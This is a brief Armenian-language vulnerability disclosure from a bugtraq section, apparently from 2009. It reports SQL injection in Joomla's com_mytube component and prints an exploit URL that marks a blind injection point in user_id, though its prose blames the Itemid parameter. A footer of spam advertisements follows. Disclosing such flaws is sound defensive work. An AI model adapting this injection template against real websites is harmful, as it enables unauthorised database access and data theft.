SQL-ինյեկցիա` Joomla com_mytube կոմպոնենտում

Ամսաթիվ` 02/11/2009 Բաժին` Բագթրեք

Համակարգը` Joomla, կոմպոնենտը` com_mytube

Այս բացը, հնարավորություն է տալիս կայքի գրանցված անդամին կատարել տարբեր SQL հրամաններ: Այս բացը գոյություն ունի այն պատճառով, քանի որ index.php-ում լավ չեն մշակել «Itemid» պարամետրի մուտքային տվյալները:

Ահա և Exploit-ը`

http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null

Leave a Reply

«
»

  Գովազդ
There is a oil purification for sale | продажа холодильников | There is an enormous selection brand clothing in modern on-line shops | неоновые вывески | брусчатка гранитная | Pokerspiele online | Instant SEO company | электромонтаж | У нас - php, украинский хостинг и платный хостинг